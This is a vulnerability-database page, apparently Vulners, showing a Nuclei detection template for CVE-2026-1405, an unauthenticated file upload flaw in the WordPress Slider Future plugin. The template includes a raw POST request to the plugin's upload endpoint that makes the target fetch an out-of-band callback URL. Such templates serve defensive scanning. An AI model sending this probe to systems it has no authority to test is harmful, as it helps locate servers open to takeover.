Lucene search
K

WordPress Slider Future <= 1.0.5 - Unauthenticated Arbitrary File Upload

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

Unauthenticated arbitrary file upload in WordPress Slider Future plugin <=1.0.5 allows remote code.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-1405
20 Feb 202622:12
githubexploit
Circl
CVE-2026-1405
19 Feb 202617:06
circl
CNNVD
WordPress plugin Slider Future 代码问题漏洞
19 Feb 202600:00
cnnvd
CVE
CVE-2026-1405
19 Feb 202604:36
cve
Cvelist
CVE-2026-1405 Slider Future <= 1.0.5 - Unauthenticated Arbitrary File Upload
19 Feb 202604:36
cvelist
NVD
CVE-2026-1405
19 Feb 202607:17
nvd
Packet Storm
📄 WordPress Slider‑Future 1.0.5 Arbitrary File Upload
27 Feb 202600:00
packetstorm
Patchstack
WordPress Slider Future plugin <= 1.0.5 - Unauthenticated Arbitrary File Upload vulnerability
19 Feb 202607:53
patchstack
Positive Technologies
PT-2026-20278
17 Feb 202600:00
ptsecurity
RedhatCVE
CVE-2026-1405
20 Feb 202607:21
redhatcve
Rows per page
id: CVE-2026-1405

info:
  name: WordPress Slider Future <= 1.0.5 - Unauthenticated Arbitrary File Upload
  author: pussycat0x
  severity: critical
  description: |
    Slider Future WordPress plugin <= 1.0.5 contains an unrestricted file upload vulnerability caused by missing file type validation in 'slider_future_handle_image_upload', letting unauthenticated attackers upload arbitrary files, exploit requires no authentication.
  remediation: |
    Update to a version later than 1.0.5 or the latest available version.
  impact:
    Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-1405
    epss-score: 0.03177
    epss-percentile: 0.86498
    cwe-id: CWE-434
  tags: cve,cve2026,wordpress,wp-plugin,slider-future,file-upload,rce,oast,vkev

http:
  - raw:
      - |
        POST /wp-json/slider-future/v1/upload-image/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"image_url":"http://{{interactsh-url}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
          - 'status_code == 200'
          - 'contains(content_type,"application/json")'
          - 'contains_all(body,"url","wp-content")'
        condition: and
# digest: 4a0a0047304502206ff98d965a094a2aa17e579f08cd9e9291c6570878a73b98226acfe74dfc14ad0221008f7fe7af5e2deb92091c25e624f5ddece4fb263273e24c6d874e0df044a5d39c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation